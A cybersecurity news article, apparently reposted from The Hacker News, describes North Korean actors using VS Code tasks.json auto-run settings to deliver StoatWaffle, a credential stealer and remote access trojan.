North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

Staff Editor 2026-03-23
North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

Publish Date: 2026-03-23 14:09:00

Source Domain: thehackernews.com

The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as StoatWaffle that’s distributed via malicious Microsoft Visual Studio Code (VS Code) projects.

The use of VS Code “tasks.json” to distribute malware is a relatively new tactic adopted by the threat actor since December 2025, with the attacks leveraging the “runOn: folderOpen” option to automatically trigger its execution every time any file in the project folder is opened in VS Code.

“This task is configured so that it downloads data from a web application on Vercel regardless of executing OS [operating system],” NTT Security said in a report published last week. “Though we assume that the executing OS is Windows in this article, the essential behaviors are the same for any OS.”

The downloaded payload first checks whether Node.js is installed in the executing environment. If it’s absent, the malware downloads Node.js from the official website and installs it. Subsequently, it proceeds to launch a downloader, which periodically polls an external server to fetch a next-stage downloader that exhibits identical behavior by reaching out to another endpoint on the same server and executing the received response as Node.js code.

StoatWaffle has been found to deliver two different modules –

  • A stealer that captures credentials and extension data stored in web browsers (Chromium-based browsers and Mozilla Firefox) and uploads them to a command-and-control (C2) server. If the compromised system runs on macOS, it also steals the iCloud Keychain database.
  • A remote access trojan (RAT) that communicates with the C2 server to fetch and execute commands on the infected host. The commands allow the malware to change the current working directory, enumerate files and directories, execute Node.js code, upload file, recursively search the given directory and list or upload files matching a certain keyword, run shell commands, and…

Source

More Stories

The FCC Wants to Kill Burner Phones

The FCC Wants to Kill Burner Phones

Staff Editor 2026-06-13
Accenture cyber leads: why hiring more people won’t solve the cybersecurity talent gap

Accenture cyber leads: why hiring more people won’t solve the cybersecurity talent gap

Staff Editor 2026-06-13
U.S. CISA adds Oracle PeopleSoft Enterprise PeopleTools flaw to its Known Exploited Vulnerabilities catalog

U.S. CISA adds Oracle PeopleSoft Enterprise PeopleTools flaw to its Known Exploited Vulnerabilities catalog

Staff Editor 2026-06-13

Terms and Conditions - Privacy Policy